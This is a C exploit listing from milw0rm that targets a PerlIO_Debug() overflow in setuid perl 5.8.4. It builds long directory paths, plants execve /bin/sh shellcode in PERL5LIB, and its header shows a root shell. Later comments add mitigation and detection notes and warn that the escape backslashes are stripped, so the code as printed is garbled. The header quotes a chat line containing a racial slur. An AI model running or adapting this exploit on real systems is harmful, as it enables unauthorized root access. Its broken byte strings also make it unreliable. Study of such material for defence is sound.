/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
/*
 * Entry point. Builds a deeply nested directory tree under /tmp, writes a
 * short script whose first line names a setuid perl interpreter into the
 * deepest directory, sets PERLIO_DEBUG and PERL5LIB in the environment, and
 * execs that script (target version: see the file header).
 *
 * Defender's reading: everything this program controls crosses the
 * privilege boundary through two channels only -- the environment block and
 * the working-directory path -- that a setuid interpreter inherits at start.
 * The general mitigation is for a setuid interpreter to ignore debugging and
 * tuning environment variables (PERLIO_DEBUG here) when euid != uid, and to
 * bound any path it copies; removing suidperl altogether retires the whole
 * class. Detection hint: a setuid interpreter started with PERLIO_DEBUG set
 * and an unusually long cwd under /tmp is a workable audit signal.
 *
 * Note on this copy of the listing: the backslashes of the C escape
 * sequences have been stripped (compare "Dirlen: %dn" below with the
 * "Dirlen: 1052" line of the header), so "x90" is three plain characters and
 * no format string ends in a newline. As printed it does not build into what
 * the header describes; read it as an illustration only.
 * NOTE(review): the signature is nonstandard -- main takes `int argc`, not
 * `int *argc`; argv is unused.
 */
int main(int *argc, char **argv)
{
int len = 23;          // bytes of 'A' padding written into tmp before the putLong values
int count = 5;         // running length of the path built under /tmp; printed as "Dirlen"
char malpath[10000];   // absolute path of the written script (getcwd() + "/take_me.pl")
char tmp[256];         // final directory component; only len + 12 bytes are ever written before strcat
char *filler;          // one directory name, reused for every nesting level
char *ptr;             // write cursor into tmp for putLong
// Placed into PERL5LIB below. Declared unsigned char[], which does not match
// the const char * that setenv() expects. Escapes are stripped in this copy.
unsigned char code[] =
/*
0xff-less execve() /bin/sh by anathema <[email protected]>
Linux/IA32 0xff-less execve() shellcode.
*/
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
// setuid(0) - fix for redhat based machines
"x31xdb" // xorl %ebx,%ebx
"x8dx43x17" // leal 0x17(%ebx),%eax
"xcdx80" // int $0x80
"x89xe6" /* movl %esp, %esi */
"x83xc6x30" /* addl $0x30, %esi */
"xb8x2ex62x69x6e" /* movl $0x6e69622e, %eax */
"x40" /* incl %eax */
"x89x06" /* movl %eax, (%esi) */
"xb8x2ex73x68x21" /* movl $0x2168732e, %eax */
"x40" /* incl %eax */
"x89x46x04" /* movl %eax, 0x04(%esi) */
"x29xc0" /* subl %eax, %eax */
"x88x46x07" /* movb %al, 0x07(%esi) */
"x89x76x08" /* movl %esi, 0x08(%esi) */
"x89x46x0c" /* movl %eax, 0x0c(%esi) */
"xb0x0b" /* movb $0x0b, %al */
"x87xf3" /* xchgl %esi, %ebx */
"x8dx4bx08" /* leal 0x08(%ebx), %ecx */
"x8dx53x0c" /* leal 0x0c(%ebx), %edx */
"xcdx80" /* int $0x80 */;
chdir("/tmp/");        // all artefacts are created under /tmp; return value is not checked
// do one less char than usual for RedHat
// Directory name reused at every level; presumably 255 'A' plus the slash,
// since count advances by 255 per level below -- TODO confirm by counting.
filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";
// Four nesting levels. mkdir/chdir results are ignored, so a tree left over
// from an earlier run is silently reused and a failed chdir goes unnoticed.
for (int x=0; x<4; x=x+1)
{
mkdir(filler, 0777);
chdir(filler);
// do one less char than usual for RedHat
count = count + 255;
}
// tmp receives len bytes of 'A' but no terminator here; the strcat below
// therefore scans indeterminate stack bytes for the NUL it needs (UB).
memset(tmp,0x41,len);
count = count + len;
ptr = tmp+len;
// putLong is defined further down this file and no prototype is in scope at
// this point; C99 removed implicit function declarations, so the documented
// `-std=c99` build depends on the compiler tolerating this.
ptr = putLong (ptr, 0xbffffb6a); // frame 11 ebp
ptr = putLong (ptr, 0xbffffb6a);
ptr = putLong (ptr, 0xbffffb6a);
strcat(tmp, "/");
mkdir(tmp, 0777);
chdir(tmp);
printf ("Dirlen: %dn", count);   // "n" is a stripped "\n" in this copy
FILE *perlsploit;
// Body of the script that is written out: an interpreter line followed by
// comment lines only.
char perldummyfile[] = {
"#!/usr/bin/sperl5.8.4n"
"# n"
"# Be proud that perl(1) may proclaim: n"
"# Setuid Perl scripts are safer than C programs ...n"
"# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. n"
};
if(!(perlsploit = fopen("take_me.pl","w+"))) {
printf("error opening filen");
exit(1);
}
// sizeof - 1 drops the array's trailing NUL; fwrite/fclose results unchecked.
fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit);
fclose(perlsploit);
getcwd(malpath, 10000);   // return value unchecked; 10000 duplicates sizeof malpath
strcat(malpath, "/");
strcat(malpath, "take_me.pl");
printf("Charlie Murphy!!!@#@n");
chmod(malpath,0755);      // 0755: no setuid bit is set on the script file itself
// The environment is the only thing handed to the privileged interpreter
// that this program controls; a setuid interpreter should ignore both of
// these when euid != uid.
setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1);
setenv("PERL5LIB", code, 1);   // unsigned char * passed where const char * is expected
// argv is a bare NULL rather than a NULL-terminated array; Linux has
// historically tolerated this, but it is not portable.
execv(malpath,(char *) NULL);
}
/*
 * Store the low 32 bits of `value` at `ptr`, least-significant byte first
 * (little-endian), and return the position just past the four bytes written.
 *
 * The caller must guarantee at least four writable bytes at `ptr`; no bounds
 * check is performed. Bits of `value` above bit 31 are ignored.
 */
char*
putLong (char* ptr, long value)
{
    unsigned long bits = (unsigned long) value;
    for (int shift = 0; shift < 32; shift += 8) {
        *ptr = (char) ((bits >> shift) & 0xff);
        ptr++;
    }
    return ptr;
}
// milw0rm.com [2005-02-07]